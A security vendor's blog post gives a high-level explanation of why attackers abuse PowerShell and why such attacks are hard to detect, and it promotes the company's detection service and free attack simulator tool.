Blog Post July 13, 2023

Battling PowerShell Attacks with Cybersecurity Automation

By: Krystal Rennie, Director of Corporate Communications 

In today’s digital age, there are multiple ways that we use computer systems to carry out our everyday tasks. From accessing the internet to sending emails, we constantly exhibit new patterns in navigating the digital world through automation. While this is normal behavior, it also leaves trails for cybercriminals to use against your organization.  

According to Microsoft, PowerShell is “a cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework. PowerShell runs on Windows, Linux, and macOS.” It provides an interface for system administrators and users to carry out various tasks like running files, taking screenshots on the computer, accessing the internet, and more. 

This blog will explore how cybercriminals can use PowerShell, why they are so hard to detect, and how you can ensure your organization remains vigilant against attackers.  

PowerShell Attacks in Action   

To put it simply, PowerShell is a language installed on all Windows computers, so by default, it is an easy entry point for cybercriminals to abuse because they do not have to bring their own tools. PowerShell is also used by system administrators to complete their tasks and is required to make Windows run, so it cannot be removed from Windows as it is a core functionality.  

In action, cybercriminals tend to abuse PowerShell because it allows them to take full advantage of it as a living-off-the-land tactic. Malicious actors can use PowerShell to create a malware implant or download and execute malware. Once they access your network, they can run commands and remain under the radar.  

For example, an attacker can execute PowerShell through a simple spear phishing email, and the email includes a PDF or a Word document as an attachment; when the PDF or Word document gets opened, that then triggers PowerShell to run at the end of the malware code.  PowerShell will then download the additional malware stages to infect the computer.  

Cybercriminals do not go out of their way to reinvent the wheel when planning their attacks; where there is an easy point of entry, they will use it to their advantage. Opening an attachment is a common task for employees, and cybercriminals know that. Using familiar techniques like the above is a perfect way to lure in potential victims and gain access to organizational data.  

Why are PowerShell Attacks Difficult to Detect?  

As attackers advance their techniques, they also recognize that to maintain success, they must keep their tactics simple yet effective. Below are a few reasons PowerShell attacks are hard to detect: 

  1. Easy Access to Windows API: PowerShell allows cybercriminals to carry out automated tasks and everyday administrative tasks without having to worry about being blocked by an IT team.  
  2. Living-off-the-Land: PowerShell is a powerful command prompt that can do whatever it’s told. Cybercriminals use PowerShell as a native tool operating within all Windows computers to advance their attacks. The ability to use techniques that are already a part of a system allows cybercriminals to do less prep work and execute quicker. 
  3. Hiding in Plain Sight: Cybercriminals will often encode PowerShell algorithms to make them appear as a string of letters and numbers. This allows the detection of malicious commands to obscure security systems because it would require decoding. 

Although detection can be tricky when looking at PowerShell as an attack method, with proper tools in place, such as an automated security solution with threat intelligence, it is not impossible. 

For example, Adlumin’s Threat Research team recently uncovered “PowerDrop,” a malicious PowerShell script that has set its sights on the U.S. aerospace industry. The malicious malware uses advanced techniques to evade detection such as deception, encoding, and encryption. The threat was detected by Adlumin’s machine learning-based algorithms which analyze PowerShell commands and arguments at run-time. In essence, the malware is used to run remote commands against victim networks after gaining initial access, execution, and persistence into servers. 

Implementing an automated security solution with a multi-layer detection approach is the key to successfully uncovering attackers’ actions in your network and protecting your organization before chaos hits.  With the proper solution malicious behavior can be detected, alerted and responded to in real-time.  

Test Your Defenses: PowerShell Attack Simulator Tool 

Ensuring your organization has the proper tools and proactive measures to protect against PowerShell attacks is essential. Specifically, testing your environment for PowerShell-based attacks. As automation, cybersecurity, and the digital landscape evolve, cybercriminals will only become more advanced in planning their attacks. 

Adlumin has developed a free tool for security teams to test their defenses against common ways attackers gain access. PowerShell is a common tool attackers leverage to infiltrate an environment. The simulation runs through multiple ways PowerShell may be used maliciously so that you can gain visibility into your coverage against these threats.  

See how your security stands against the tactics and tricks used by cybercriminals. Download Adlumin’s free PowerShell Attack Simulator tool today or contact one of our cybersecurity experts for a demo and more information.